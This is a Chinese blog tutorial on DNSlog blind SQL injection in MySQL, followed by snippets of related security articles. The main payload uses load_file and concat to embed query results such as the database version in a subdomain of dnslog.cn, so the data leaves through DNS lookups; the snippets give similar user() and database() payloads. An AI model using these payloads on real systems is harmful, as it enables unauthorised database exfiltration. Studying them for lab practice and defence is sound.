sql盲注进阶篇-dnslog盲注

最新推荐文章于 2024-09-12 01:14:13 发布
最新推荐文章于 2024-09-12 01:14:13 发布
阅读量3.5k 收藏 1
点赞数
分类专栏: 渗透sql篇 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jerry_gujy/article/details/123868506
版权

满足条件

mysql.ini中secure_file_priv必须为空不是null。

secure_file_priv=

secure_file_priv参数及含义

●secure_file_priv 为null 不允许导入导出。
●secure_file_priv 为/tmp 导入导出只能在/tmp目录下。
●secure_file_priv 为空时 则不做限制允许导入导出。

使用工具

DNSLog PlatformDNSLog平台icon-default.png?t=M276http://www.dnslog.cn/

原理

DNS在解析的时候会留下日志,咱们这个就是读取多级域名的解析日志,来获取信息
简单来说就是把信息放在高级域名中,传递到自己这,然后读取日志,获取信息。

如图

 

用例

1、获取dns

2、确定是字符注入还是数值注入

?id=1'#和?id=1#

3、是否存在注入点

?id=1 and 1=1#和?id=1 and 1=2#

4、log注入

?id=1 and  load_file(concat('\\\\',(select version()),'.qdyxbz.dnslog.cn\\abc')) 
#'.qdyxbz.dnslog.cn\\abc' 这里的格式为'.dns域名\\abc'

此处concat('\\\\',(select version()),'.qdyxbz.dnslog.cn.cn\\abc')

执行的结果为 \\5.5.53.qdyxbz.dnslog.cn.cn\abc

(\\是文件目录,5.5.53是版本号,.是用来拼接的 ,qdyxbz.dnslog.cn是dns域名,\abc是目录)

5、回显 版本号,库

 

 

Web安全漏洞——SSTI模版注入(初级)
m0_61506558的博客
11-12 1491
(这里特指用于Web开发的模版引擎)是为了使用户界面与业务数据(内容)分离而产生的,它可以生成特定格式的文档,利用模版引擎来生成前端的html代码,模版引擎会提供一套生成html代码的程序,然后只需要获取用户的数据,然后放到渲染函数里,然后生成模版+用户数据的前端html页面,然后反馈给浏览器,呈现在用户面前(如图一)。模版引擎也会提供沙箱机制来进行漏洞防范,但是可以用沙箱逃逸技术来进行绕过。(一)简介用于使用动态数据呈现内容。此上下文数据通常由用户控制并由模板进行格式化,以生成网页、电子邮件等。
利用DNSlog进行sql盲注
weixin_44743506的博客
08-30 2261
一、原理 测试一些网站的时候,一些注入都是无回显的,手工盲注效率太低,我们可以写脚本来进行盲注,但有些网站会ban掉我们的ip,虽然可以通过设置ip代理池解决,但是盲注往往效率很低,所以产生了DNSlog注入。 首先有一个可以用于dns解析的域名,比如ceye.io。通过代理商设置域名ceye.io的nameserver为自己的服务器a,再在服务器a上配置好dns服务器,这样所有ceye.io...
dnslogsql盲注
CvtNhso的博客
01-31 500
相当于请求了一个UNC的地址就是这样一个数据\\user().kysngm.dnslog.cn这个主机下的/abc这个共享文件夹虽然不存在但是无所谓我们的目的是需要将user()数据获取,它会将数据解析到我们使用的dnslog.cn中它可以记录解析后的数据。可以进到my.ini文件中将secure_file_priv的值从null改为""secure_file_priv为null,load_file则不能加载文件。secure_file_priv为路径,可以读取路径中的文件;
SQL注入——sqli-labs-Less-9时间盲注_sqliless9
最新发布
2401_87034325的博客
09-12 480
测得第二位是ASCII码101,是字母“e”依次穷举类推,判断出来数据库名为security,库名长度8位。
sql注入--11dnslog盲注
技术骨干小李的博客
07-27 338
攻击者--发送payload–>web服务器---->数据库(解析loadfile函数)---->根据语句包含的域名访问本地dns服务器–不能解析发送到–>公网上dns服务器解析–解析完成后–>dns本地服务器---->攻击者服务器。因为在数据库中已经把要执行的命令带入到dns解析中去了,dns服务器再发送给攻击者服务器,就可以搜到前缀,前缀就是我们想得到的信息。上面显示的域名就是帮助我们模拟了一个攻击者服务器的域名。利用dns外带的形式。...
SQL注入-盲注-时间注入-报错注入-布尔盲注-DNSlog注入-宽字节注入-WAF绕过-SqlMap使用
VictorZhang
07-30 6161
Sqli-labs的安装 1.安装WAMP http://www.wampserver.com/ WAMP是php + mysql + Apache环境集成工具 2.下载Sqli-labs https://github.com/webattacker/sqli-labs 将Sqli-labs解压后整个目录拖拽到路劲:C:\wamp64\www 下 3.在浏览器上访问http://localhost...
mysql dnslog_DNSlog盲注
weixin_33365844的博客
01-27 323
前言在渗透测试中,经常遇到如下情景:1,sql盲注2,blind型ssrf以及xxe3,无回显命令执行漏洞...dnslog盲注原理开放的DNSlog平台:http://ceye.io/在http://ceye.io/上我们可以获取到有关ceye.io的DNS查询信息。域名解析的过程,是由顶级域名向下逐级解析。我们构造的攻击语句也是如此,当它发现域名中存在ceye.io时,它会将这条域名信息转到相...
2024年最全网络安全面试题目之渗透篇(一)_burp重复提交数据包(2)
m0_60691292的博客
05-01 911
你平时用的比较多的漏洞是哪些?相关漏洞的原理?以及对应漏洞的修复方案? JAVA 为什么有的时候没有错误回显 webshell检测,有哪些方法 php的LFI,本地包含漏洞原理是什么?写一段带有漏洞的代码。手工的话如何发掘?如果无报错回显,你是怎么遍历文件的? IIS 6.0IIS 7.0/7.5NginxApache windows权限提升(二) Linux linux权限提升 反弹 shell 的常用命令?一般常反弹哪一种 shell?为什么?
史上最全网络安全面试题总结
热门推荐
03-17 2万+
新的一年,难免有不少小伙伴面临跳槽或者找工作,本文总结了常见的安全岗位面试题,方便各位复习。祝各位事业顺利,财运亨通。 php爆绝对路径方法? 单引号引起数据库报错 访问错误参数或错误路径 探针类文件如phpinfo 扫描开发未删除的测试文件 google hacking phpmyadmin报路径:/phpmyadmin/libraries/lect_lang.lib.php 利用漏洞读取配置文件找路径 恶意使用网站功能,如本地图片读取功能读取不存在图片,上传点上传不能正常导入的文件 你常用的渗
SQL盲注——时间盲注dnslog盲注
mikeyning的博客
10-27 263
SQL盲注——时间盲注dnslog盲注 时间盲注 时间盲注原理 $id=$_GET['id']; $sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1"; $result=mysql_query($sql); $row = mysql_fetch_array($result); if($row) { echo 'You are in...........'; } else { echo 'You are in...........';
SQL注入-DNSLOG打消你的盲打盲注
weixin_54217950的博客
02-18 4310
Dnslog Dnslog就是存储在DNS Server上的域名信息,它记录着用户对域名www.test.com、t00ls.com.等的访问信息。 Dnslog盲注 对于SQL盲注,我们可以通过布尔或者时间盲注获取内容,但是整个过程效率低,需要发送很多的请求进行判断,容易触发安全设备的防护,Dnslog盲注可以减少发送的请求,直接回显数据实现注入 使用DnsLog盲注仅限于windos环境。 其中,红色部分是可控的。我们只需要搭建一个红色部分的DNS服务器,并将要盲打或盲注的回显,放到自己域名的二级甚至
SQL注入学习-Dnslog盲注
笑花大王
02-17 712
1.基础知识 1.DNS DNS(Domain Name System,域名系统),因特网上作为域名和IP地址相互映射的一个分布式数据库,能够使用户更方便的访问互联网,而不用去记住能够被机器直接读取的IP数串。通过主机名,最终得到该主机名对应的IP地址的过程叫做域名解析(或主机名解析)。DNS协议运行在UDP协议之上,使用端口号53。在RFC文档中RFC 2181对DNS有规范说明,RF...
dnslog盲注原理
qq_50854662的博客
01-21 271
Dnslog盲注原理 布尔盲注和时间盲注相当于猜单词的游戏,我们需要对每一位逐步的猜测,效率很低,需要发送很多的请求进行判断,很可能会触发安全设备的防护 我们需要一种方式能够减少请求,直接回显数据——Dnslog注入 Dns在解析的时候会留下日志,通过读取多级域名的解析日志,获取请求信息 Dnslog盲注方法 登录http://ceye.io/网站并注册,得到属于自己的identifier 先尝试在终端运行curl dnslog.4ke30o.ceye.io Mysql load_file()函
sql 注入 Dnslog
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
04-12 391
通常我们面对SQL注入过程中没有回显的情况下,只能通过盲注的方式来判断是否存在SQL注入,但是,使用盲注,手工测试是需要花费大量的时间的,可能会想到使用sqlmap直接去跑出数据,但在实际测试中,使用sqlmap跑盲注,有很大的几率,网站把ip给封掉,这就影响了我们的测试进度,也许你也可以使用代理池。。。
SQL注入——DNSLOG注入
qq_52263650的博客
11-17 806
SQL注入——DNSlog注入
SQL注入之DnsLog注入
qq_52310755的博客
03-22 2155
远程访问UNC路径中主机的地址,如果是域名将会进行解析并留下记录,通过查看DNS解析记录(DNS日志)来达到有回显的目的。DnsLog注入就是利用load_file()函数访问远程文件的特点,对延时盲注等无回显的注入或其他无回显的攻击带来回显。正常来讲每个查询记录都会在相应DNS服务器上留下相关的查询日志,一般来说企业或者自己部署的DNS在上图标红位置处,Ps:如果paylaod没有问题但一直刷新不出来可能是谷歌浏览器的问题,换个浏览器访问一下就可以了。,下面以盲注为例,需要有盲注的基础。
SQL注入之DNS_log注入
weixin_47785246的博客
07-11 902
SQL注入之DNS_log注入 这篇文章将系统的讲解,SQL注入中的DNS_log注入的原理、方法、以及靶场练习writeup。 文章目录SQL注入之DNS_log注入前言一、DNS_log注入原理二、靶场实战1.DNSlog 平台2.封神台靶场总结 前言 关于SQL注入的详细内容请看我之前写的文章 提示:以下是本篇文章正文内容,下面案例可供参考 一、DNS_log注入原理 我们都知道,DNS解析是一种用户访问域名时,客户端向DNS发起DNS查询的到目标服务器ip地址,进而实现通信的机制,而
SQL注入之DNS盲注
SDM_JH的博客
07-28 331
一、准备一个自己的域名 利用DNS进行sql盲注需要一个拥有可以修改dns权限的域名,然后需要在你的DNS服务器上把需要注入的域名委托到攻击机上,也就是当请求你域名中的子域的解析请求都会解析到攻击机,然后我们在攻击机监听53 端口即可。 二、构造注入语句 注入语句:http://域名/test.php?user=root' and load_file(concat('\\\\',(select database()),'添加的子域名\\aaa'))# 可以利用sqlmap中的dns.py脚本监听53端
SQL注入之搭建dnslog
qq_57686163的博客
08-06 630
《‘。’》
SQL盲注攻击技术详解
"这篇文档是关于SQL盲注攻击技术的综述,由Javaphile撰写,适合学习数据库安全的人员阅读。文章首先定义了SQL注入及其风险,并回顾了现有的解决方案及其不足。接着,它讨论了在服务器仅给出最小响应的情况下如何识别...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值